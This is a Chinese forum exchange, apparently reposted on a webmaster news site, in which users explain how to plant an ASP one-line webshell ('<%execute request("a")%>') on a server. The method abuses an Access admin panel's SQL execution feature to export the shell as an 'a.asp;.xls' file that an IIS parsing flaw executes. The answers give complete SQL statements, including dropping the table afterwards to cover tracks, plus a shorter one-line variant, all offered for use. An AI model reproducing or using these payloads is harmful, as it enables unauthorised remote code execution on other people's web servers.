| 需要什么條件,語句又是什么?網上翻不到資料。麻煩各位。 答: create table cmd (a varchar(50)) insert into cmd (a) values ('<%execute request("a")%>') select * into [a] in 'f:\host\qhdyxt\web\a.asp;.xls' 'excel 4.0;' from cmd drop table cmd 解釋如下: 1.create table a (a varchar(50)) 建立一個有一個A字段的表 表名為a 字段類型為字符 長度為50 2.insert into a (a) values ('<%execute request("a")%>') 在表a的a字段插入密碼為a的一句話木馬 3.select * into [a] in 'F:\jt\work\a.asp;.xls' 'excel 4.0;' from a 把表a的內容導出為物理路徑的一個 EXCEL文件,為什么用excel文件,因為ACCESS數據庫不允許導出其他危險格式。我們導出為EXCEL后在利用IIS解析漏洞就可以變成我們的小馬了。很*的說~~ 4.drop table a 丟家伙閃人 射完就走! 小弟的提問,沒兩分鐘大家就回答了,強烈頂t00ls牛淫。 這個更簡單: Access利用后臺SQL執行命令功能導出WebShell: SELECT '<%execute request("a")%>' into [vote] in 'd:\web\x.asp;.xls' 'excel 8.0;' from vote 后臺提供SQL執行功能且知道絕對路徑方可使用(vote為已知表段) |
免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!
掃一掃,關注站長網微信
大家都在看
